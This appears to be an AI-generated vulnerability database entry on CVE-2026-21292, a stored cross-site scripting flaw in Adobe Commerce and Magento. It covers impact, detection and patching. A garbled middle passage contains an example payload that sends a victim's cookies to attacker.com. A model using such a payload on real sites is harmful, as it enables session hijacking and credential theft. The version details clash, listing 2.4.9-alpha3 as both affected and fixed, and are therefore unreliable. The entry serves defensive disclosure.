
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21292 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. The vulnerability affects Adobe Commerce and Magento Open Source versions 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16, and all earlier versions; Adobe Commerce B2B is also affected across multiple versions. It was disclosed on March 10–11, 2026, via Adobe's security advisory APSB26-05. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored (persistent) variant. An attacker with low-level authenticated access can inject malicious JavaScript or HTML into vulnerable form fields within the Adobe Commerce admin or storefront; the payload is stored server-side and subsequently rendered in the browsers of other users who visit the affected page. Exploitation requires user interaction — a victim must navigate to the page containing the injected content for the script to execute. No specific technical write-up or public PoC code has been identified at this time (Adobe Advisory, Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. The changed scope (S:C in the CVSS vector) indicates the impact extends beyond the attacker's own session to affect other users. While confidentiality and integrity impacts are rated Low and availability is unaffected, the risk is amplified in e-commerce environments where admin or customer sessions may expose payment data, order details, or account credentials (Adobe Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save/submit the form.<script>, onerror=, javascript:) in field values; repeated access to specific admin or storefront pages by unfamiliar user accounts.Adobe has released patched versions addressing this vulnerability: Adobe Commerce 2.4.9-alpha3 (fixed), 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, and 2.4.4-p16 — administrators should upgrade to these versions or later immediately (Adobe Advisory). As interim mitigations, implement a strict Content Security Policy (CSP) to restrict unauthorized script execution, and enforce rigorous server-side input validation and output encoding on all user-supplied form fields. Restrict low-privileged user access to sensitive form fields where possible, and monitor application logs for suspicious input patterns.
The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in the March 2026 update cycle, including this CVE (CIS Advisory). Coverage was also noted on security aggregation platforms such as BeyondMachines and CVEFeed shortly after disclosure. No notable individual researcher commentary or significant social media discussion has been identified beyond routine CVE tracking posts.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."